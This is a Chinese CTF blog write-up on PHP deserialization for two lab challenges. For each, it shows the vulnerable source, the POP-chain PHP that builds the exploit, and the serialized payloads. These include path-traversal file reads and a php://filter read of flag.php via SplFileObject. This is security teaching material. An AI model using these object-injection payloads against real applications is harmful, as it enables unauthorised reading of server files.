php反序列化

已于 2024-04-29 09:56:51 修改
阅读量280 收藏 9
点赞数 3
文章标签: 笔记
于 2024-04-29 09:56:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77961060/article/details/138302843
版权
文章详细描述了一段PHP代码中的安全漏洞,涉及类的构造函数、魔术方法和反序列化操作。作者揭示了一个通过构造特定对象链来触发恶意文件读取的行为,展示了如何利用这些功能进行潜在的攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.[第五空间 2021]pklovecloud

进行代码审计

     <?php  
    include 'flag.php';
    class pkshow
    {  
        function echo_name()     
        {          
            return "Pk very safe^.^";      
        }  
    }
     
    class acp
    {   
        protected $cinder;  
        public $neutron;
        public $nova;
        function __construct()
        {      
            $this->cinder = new pkshow;
        }  
        function __toString()      
        {          
            if (isset($this->cinder))  
                return $this->cinder->echo_name();      
        }  
    }  
     
    class ace
    {    
        public $filename;     
        public $openstack;
        public $docker;
        function echo_name()      
        {   
            $this->openstack = unserialize($this->docker);
            $this->openstack->neutron = $heat;
            if($this->openstack->neutron === $this->openstack->nova)
            {
            $file = "./{$this->filename}";
                if (file_get_contents($file))         
                {              
                    return file_get_contents($file);
                }  
                else
                {
                    return "keystone lost~";
                }    
            }
        }  
    }  
     
    if (isset($_GET['pks']))  
    {
        $logData = unserialize($_GET['pks']);
        echo $logData;
    }
    else
    {
        highlight_file(__file__);
    }
    ?>

 包含flag.php文件,有三个类:

pkshow,echo_name这个函数

acp,cinder这个保护属性,neutron,nova这两个公有属性;construct,tostring这两个魔术方法。

ace,filename,openstack,docker这三个公有属性;echo_name这个函数。

一个if语句。

第一步找危险函数,找到ace下的echo_name函数,里面有file_get_contents这个读取函数,当filename='flag.php'时就会输出flag,但它要通过前面的这个强比较,

第二步,想要触发echo_name函数就必须触发toString魔术方法。

第三步,tostring函数的触发条件是把对象当成字符串调用,找到construct函数下的cinder。只用把cinder变成对象acp,那么给cinder赋值的时候就是把对象当成字符串调用,就可以触发tostring函数。

第四步,想要触发construct函数就必须实例化一个对象,可以令cinder=new ace(),这里为什么不是保存原来的cinder=new pkshow()呢?那是因为在执行tostring魔术方法时会触发echo_name,我们要触发的echo_name函数是ace这个类下面的,并不是pkshow这个类下面的,而函数想要触发就必须在这个类下面,所以改成new ace()后不会触发pkshow()里面的echo_name函数。

总结:

ace->echo_name

acp->tostring

acp->construct

接着就可以写代码,构造pop链,因为我们是反着分析的,构造pop链就要反过,先把construct过了。

    <?php  
    include 'flag.php';
    class pkshow
    {  
        function echo_name()     
        {          
            return "Pk very safe^.^";      
        }  
    }
     
    class acp
    {   
        protected $cinder;  
        public $neutron;
        public $nova;
        function __construct()
        {      
            $this->cinder = new ace;
     
    }  
    }
    class ace
    {    
        public $filename;     
        public $openstack;
        public $docker;
       
    }  
     
    $a=new acp();
    echo urlencode(serialize($a));
    ?>

 结果:

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

 get传参pks.

可以看到返回keystone lost~。返回代码看一下这个是怎么输出的。

     function echo_name()      
        {   
            $this->openstack = unserialize($this->docker);
            $this->openstack->neutron = $heat;
            if($this->openstack->neutron === $this->openstack->nova)
            {
            $file = "./{$this->filename}";
                if (file_get_contents($file))         
                {              
                    return file_get_contents($file);
                }  
                else
                {
                    return "keystone lost~";
                }    
            }
        }  

可以看到是强比较错误然后,返回刚刚那个的,说明我们已经到了ace下面的echo_name函数。然后在上面有$this->$openstack = unserialize($this->docker),因此只要我们使得$this->docker =null,然后让$this->filename=”flag.php”即可使得上面的判断成立,并且读取flag.php的内容;

$this->docker =null时unserialize($this->docker)为null,$openstack也为null

$this->openstack->neutron === $this->openstack->nova这个强比较就相当于两个null比较。所以就会执行file_get_contents函数,$this->filename=”flag.php”就可以读取flag,所以:

     <?php  
    include 'flag.php';
    class pkshow
    {  
        function echo_name()     
        {          
            return "Pk very safe^.^";      
        }  
    }
     
    class acp
    {   
        protected $cinder;  
        public $neutron;
        public $nova;
        function __construct()
        {      
            $this->cinder = new ace;
     
    }  
    }
    class ace
    {    
        public $filename="flag.php";     
        public $openstack;
        public $docker;
       
    }  
     
    $a=new acp();
    $b=new ace();
    $b->docker=" ";
    echo urlencode(serialize($a));
    ?>

 得到

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

 传参看看

 执行了但什么都没有,看看源代码

 修改一下代码

     <?php  
    include 'flag.php';
    class pkshow
    {  
        function echo_name()     
        {          
            return "Pk very safe^.^";      
        }  
    }
     
    class acp
    {   
        protected $cinder;  
        public $neutron;
        public $nova;
        function __construct()
        {      
            $this->cinder = new ace;
     
    }  
    }
    class ace
    {    
        public $filename="nssctfasdasdflag";     
        public $openstack;
        public $docker;
       
    }  
     
    $a=new acp();
    $b=new ace();
    $b->docker=" ";
    echo urlencode(serialize($a));
    ?>

 结果:

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22nssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

传参看看

但是不对,再改一下../nssctfasdasdflag,这个文件可能是下一级目录

     <?php  
    include 'flag.php';
    class pkshow
    {  
        function echo_name()     
        {          
            return "Pk very safe^.^";      
        }  
    }
     
    class acp
    {   
        protected $cinder;  
        public $neutron;
        public $nova;
        function __construct()
        {      
            $this->cinder = new ace;
     
    }  
    }
    class ace
    {    
        public $filename="../nssctfasdasdflag";     
        public $openstack;
        public $docker;
       
    }  
     
    $a=new acp();
    $b=new ace();
    $b->docker=" ";
    echo urlencode(serialize($a));
    ?>

 得到

O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A19%3A%22..%2Fnssctfasdasdflag%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3BN%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D

传参后得到flag

 2.[GDOUCTF 2023]反方向的钟

    <?php
    error_reporting(0);
    highlight_file(__FILE__);
    // flag.php
    class teacher{
        public $name;
        public $rank;
        private $salary;
        public function __construct($name,$rank,$salary = 10000){
            $this->name = $name;
            $this->rank = $rank;
            $this->salary = $salary;
        }
    }
     
    class classroom{
        public $name;
        public $leader;
        public function __construct($name,$leader){
            $this->name = $name;
            $this->leader = $leader;
        }
        public function hahaha(){
            if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
                return False;
            }
            else{
                return True;
            }
        }
    }
     
    class school{
        public $department;
        public $headmaster;
        public function __construct($department,$ceo){
            $this->department = $department;
            $this->headmaster = $ceo;
        }
        public function IPO(){
            if($this->headmaster == 'ong'){
                echo "Pretty Good ! Ctfer!\n";
                echo new $_POST['a']($_POST['b']);
            }
        }
        public function __wakeup(){
            if($this->department->hahaha()) {
                $this->IPO();
            }
        }
    }
     
    if(isset($_GET['d'])){
        unserialize(base64_decode($_GET['d']));
    }
    ?>

代码分析

有三个类

teacher:name,rank两个公有属性,salary一个私有属性;construct一个魔术方法。

classroom:name,leader两个公有属性,construct魔术方法,hahaha函数

 school:department,headmaster两个公有属性,construct,wakeup两个魔术方法,IPO函数

 最后if语句,如果存在get传参d,就会对传参的d进行base64解码再进行反序列化

第一步找危险函数:找到IPO函数,执行该函数可以进行POST传参,是否可以利用伪协议来读取flag,POST传参:

a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

传参的a是默认读一行,后面的b是伪协议读取flag

headmaster == 'ong'这里要headmaster是ong

第二步,在wakeup函数下面可以执行IPO函数,所以只用触发wakeup函数

而wakeup函数是在反序列化前触发的,所以不用管,当你传参后就会触发该魔术方法

但是触发wakeup魔术方法后,它会触发hahaha函数,

该函数要返回true。!=是不等于符号,所以我们就让它们等于就可以返回true。

让$this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'

变成

$this->name == 'one class' or $this->leader->name == 'ing' or $this->leader->rank =='department'

所以就可以构造

    <?php
    class teacher{
        public $name;
        public $rank;
        private $salary;
    }
     
    class classroom{
        public $name;
        public $leader;
    }
     
    class school{
        public $department;
        public $headmaster;
    }
    $a=new school();
    $b=new classroom();
    $c=new teacher();
    $b->name="one class";
    $b->leader=$c;
    $c->name="ing";
    $c->rank="department";
    $a->department=$b;
    $a->headmaster="ong";
    echo base64_encode(serialize($a));
    ?>

得到

Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7Tjt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9

传参看看

输出了Pretty Good ! Ctfer!。说明pop链正确,接着就要POST传参读取flag

得到base64编码,解码得到flag

总结:做php反序列化的题要注意对其他函数的使用。

 SplFileObject可以看下面

https://blog.csdn.net/weixin_39534780/article/details/115514259?ops_request_misc=&request_id=&biz_id=102&utm_term=SplFileObject&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-1-115514259.142^v100^pc_search_result_base9&spm=1018.2226.3001.4187

PHP反序列化
这个人很懒,什么都懒得写
01-17 821
学习反序列化
php反序列化1_常见php序列化的CTF考题
最新发布
书山有路勤为径,学海无涯苦作舟
11-25 1775
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
[GDOUCTF 2023]反方向
qq_73767109的博客
06-04 978
hahaha是classroom的一个方法,所以这里要实例化classroom赋给dapartment。hahaha返回true三个变量相等其中后面两个变量明显是一个对象中的name和rank变量。a为类,b用php协议读取flag.php /代码中说了flag在flag.php中。有这两个变量的只有teacher类,所以要实例化该类并赋值给leader。返回为真的时候调用,这样又要看到dapartment调用hahaha。所以目标点加上school类中的IPO方法。
GDOUCTF web部分题解 2023
Jay17的博客
04-16 2275
GDOUCTF web部分题解 2023 (已加上NSS另外两题)
【Web】PHP反序列化刷题记录
uuzeray的博客
11-27 567
再巩固下基础。
[GDOUCTF 2023]Tea
2301_80959088的博客
08-19 260
看形式知道是tea,仔细分析一下密钥的处理有变化,是xtea,与标准的xtea形式也不同,多了一个异或。注意三个地方,解密时循环逆过来,33和(i+j),仔细看加密代码即可理解。最近的题目都不用动态,静态分析就可以了,如图注释。注意这里key有改变,和主函数不同了。
反序列化)[GDOUCTF 2023]反方向
weixin_73668856的博客
12-08 586
新的:原生类
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-16
通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
PHP反序列化入门教程(一)
weixin_46003602的博客
08-19 1053
知识点:1、PHP-反序列化-应用&识别&函数2、PHP-反序列化-魔术方法&触发规则3、PHP-反序列化-联合漏洞&POP链构造在实战情况下,是不需要知道这些具体分析的,都是利用工具去扫一些框架爆出的反序列话漏洞直接利用即可。学这些具体分析就是为了以后往漏洞挖掘方向发展或者打CTF比赛及面试会被问。
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
[极客大挑战 2019]EasySQL,[GDOUCTF 2023]反方向,Buu二维码
2301_81866263的博客
07-31 1722
所以在SELECT*FROM table_name WHERE username='1‘ or 1=1%23'and password='';用另一个’闭合后然后用%23给后面的注释掉执行 or 1=1 这一个恒对的,flag就出来了。‘1’’ 这样的话就会在sql语句中产生报错因为多出来了一个单引号。‘1“’这个是有单引号包含的话双引号就被当成字符串执行了。那么就可以比较确定这个是 ‘ ’ 包含的字符型注入了。get传输,这题是一个注入,判断一下是什么类型的。想试一下注入点的,结果直接就出了。
[GDOUCTF 2023]
rev1ve的博客
05-17 1517
再找到hahaha()所在的类为classroom,要使返回为真,三个变量赋值得为对应的值,leader指向name和rank的值,也就说明$leader=new teacher(),发现name和rank是在teacher类那里,file_get_contents()可以用php://input和data://伪协议。要执行IPO(),看到__wakeup()下,要先执行hahaha()题目是贪吃蛇游戏,F12发现被禁了,右键检查查看js代码。打开题目,f12查看网页源码发现提示/src泄露。
反方向
俐郴的专栏
07-23 1274
 呵。。。一路走好?很多人都这样相互祝福着,可怎样走,才算是一路走好??暑假的日子里,校园和社会的衔接日子里,确有力不从心的感觉,怎样才叫保持自我,不被社会同化?很多事情确实应接不暇,很难应付,青春的面庞还是留有稚嫩的痕迹。。。。以前的我为自己与这社会格格不入而庆幸,因为我就是我,无所谓个性,无所谓清高,我做我喜欢的,收获我该得到的。。。。而今,却为自己与社会的点点不融而狼狈,是对是错,学生气
【无标题】
2301_79880442的博客
04-25 1000
进行代码审计包含flag.php文件,有三个类:pkshow,echo_name这个函数acp,cinder这个保护属性,neutron,nova这两个公有属性;construct,tostring这两个魔术方法。ace,filename,openstack,docker这三个公有属性;echo_name这个函数。一个if语句。第一步找危险函数,找到ace下的echo_name函数,里面有当filename='flag.php'时就会输出flag,但它要通过前面的这个强比较,
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
ctfer的日常web:pklovecloud(CTFHUB)
Hunter1_1的博客
03-06 745
ctfer的日常web:pklovecloud(CTFHUB),php反序列化,R:2, 绕过....在 PHP 的序列化字符串中,R: 表示一个引用。在你提供的序列化字符串中,R:2; 表示引用编号为 2 的对象。这意味着,在反序列化这个字符串时,属性 "nova" 的值将是之前引用编号为 2 的对象所指向的值。即:O:8:"stdClass":2:{s:7:"neutron";s:1:"a";s:4:"nova";R:2;}
web方面题目细碎知识点(持续更新)
2301_80307383的博客
08-17 1436
其次$_SERVER['REQUEST_URL']并不会对参数中的特殊符号进行解密 所以$_SERVER['REQUEST_URL']可以用url编码绕过(也可以加号(+) 左中括号([) 空格( ) 点号(.)绕过'_')遇到$a('',$b)类似结构时,传入a=create_function和b=}system('tac /flag');$_SERVER['PHP_SELF']得到:/php/index.php/test/tt。其中,字符串a中表示函数需要传入的参数,字符串b表示函数中的执行语句。
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 871
NSSCTF[第五空间 2021]pklovecloud
深入理解PHP反序列化机制
"PHP 反序列化详解,包括serialize()函数的使用、序列化的概念和示例,以及PHP反序列化格式的解析。" 在PHP中,反序列化是一个至关重要的概念,它允许我们把之前通过序列化过程保存的字节流(通常是存储在文件或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值